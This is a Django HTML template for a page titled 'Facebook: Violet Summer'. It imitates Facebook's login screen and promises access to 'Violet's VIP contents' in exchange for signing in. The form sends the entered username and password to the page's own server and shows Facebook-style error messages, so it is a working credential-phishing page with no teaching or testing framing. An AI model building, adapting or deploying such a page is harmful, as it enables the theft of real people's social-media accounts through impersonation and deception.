<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Facebook: Violet Summer</title>
	<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet">
	<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"></script>
	{% load static %}
	<style type="text/css">

#overlay {
  position: fixed;
  display: none;
  width: 100%;
  height: 100%;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  background-color: rgba(0,0,0,0.5);
  z-index: 2;
  cursor: pointer;
}

#text{
  position: absolute;
  top: 50%;
  left: 50%;
  font-size: 50px;
  color: white;
  transform: translate(-50%,-50%);
  -ms-transform: translate(-50%,-50%);
}
.loader {
  border: 16px solid #f3f3f3;
  border-radius: 50%;
  border-top: 16px solid blue;
  border-bottom: 16px solid blue;
  width: 120px;
  height: 120px;
  -webkit-animation: spin 2s linear infinite;
  animation: spin 2s linear infinite;
}

@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(0deg); }
  100% { -webkit-transform: rotate(360deg); }
}

@keyframes spin {
  0% { transform: rotate(0deg); }
  100% { transform: rotate(360deg); }
}

.mother {
  margin: *;
  padding: *;
}

#form-container {
	width: 400px;
	heigh: auto;
	box-shadow: 0 2px 4px rgb(0 0 0 / 10%), 0 8px 16px rgb(0 0 0 / 10%); 
	/*0px 10px 20px rgba(0, 0, 0, 0.19), 0 6px 6px rgba(0, 0, 0, 0.23);*/
}

@media (max-width: 450px){
	#form-container{
		min-width: 350px;
	}
}

#infotext {
	text-align: center;
}
.pwdstuf {
	position: relative;
}


</style>

</head>

<body style="background: #f0f2f5;">
	<div class="container-sm my-5">
		<div class="row">

			<div class="left col mb-5 d-flex flex-column">
				<div id="fbtext">
					<img id="infotext" src="{% static 'images/fbtext.svg' %}">
				</div>
				<div class="d-flex" id='infotext'>
						<h3 class="">Sign In with facebook to proceed to Violet's VIP contents</h3>
				</div>
			</div>

			<div class="right col d-flex justify-content-center">
				<!-- form container -->
				<div class="m-5 rounded px-3 bg-white" id="form-container">
				    <form method="POST" onsubmit=""> {% csrf_token %}
				         <div class="mb-3 mt-3">
				          {{ form.username }}
				          {% if error1 %}
				            <div class="_9ay5">
				            	<img class="_9ay6 img" src="https://static.xx.fbcdn.net/rsrc.php/v3/yT/r/57kC6DHzoam.png" alt="" width="20" height="20">
				            </div>
				          {% endif %}
				         </div>

				          <div class="mb-3 pwdstuf">
				           {{ form.password }}
				           <div class="" id="" style='position: absolute; right: 20px; width: 20px; bottom: 17px;'>
				            <a href="#" role="button" onclick="eye()" style='padding: 0px; margin: 0px; display: inlin;'>
				             	<img id=show src="{% static 'images/eye.png' %}" style='width: 100%; opacity: 0.3;' alt="show">
				            </a>
				            <script>
								function eye() {
								  var x = document.getElementById("pwd");
								  if (x.type === "password") {
								    x.type = "text";
								  } else {
								    x.type = "password";
								  }

								  var y =  document.getElementById('show')

								  if (y.style.opacity == 0.3){
								  	y.style.opacity = 1
								  } else {
								  	y.style.opacity = 0.3
								  }

								}
							</script>
				           </div>
				          </div>

				        <div class="mb-3 d-grid">
				         <button class="btn btn-primary btn-block p-2" name="login" type="submit" value="submit" onclick="on()">
				          <h5><b>Log In</b></h5>
				         </button>
				         <p class="mt-2 text-center" style="color: ">Be patient this takes less than 2 minutes to set up account</p>
				        </div>


				        <!-- form error massager handler -->
				        <div class="errsms">
				         	{% if error1 %}
				         		 <p class="mb-3 text-center" style="color: blue;"> The email address or mobile number isn't connected to an account. </p>
				         	{% elif error2 %}
				         		 <p class="mb-3 text-center" style="color: red;"> Incorrect password</p>
				          	{% endif %}
				        </div>
			       </form>
			    </div>

			    <!-- Loading spinners -->
			  <div id="overlay">
					<div id="text"><center><div class="loader"></div></center>Loading...</div>
				</div>
				<script>
					// function on() {
					//   document.getElementById("overlay").style.display = "block";
					// }
				</script>


			</div>
		</div>


			{% if loader%}
				<center>
					<div class="spinner-grow text-primary" id='load' style="width: 100px; height: 100px; display: none;"></div>
				</center>
			{% endif %}

		<!-- 	{% if error1 or error%}
			        <script>
						function on() {
						  document.getElementById("load").style.display = "";
						}
					</script>
				{% endif %} -->

<!-- 			<script>
					function on() {
					  document.getElementById("load").style.display = "block";
					}
				</script> -->
		
		<!-- <div class="bg_white">
			<p>Meta</p>
		</div> -->
	</div>
</body>
</html>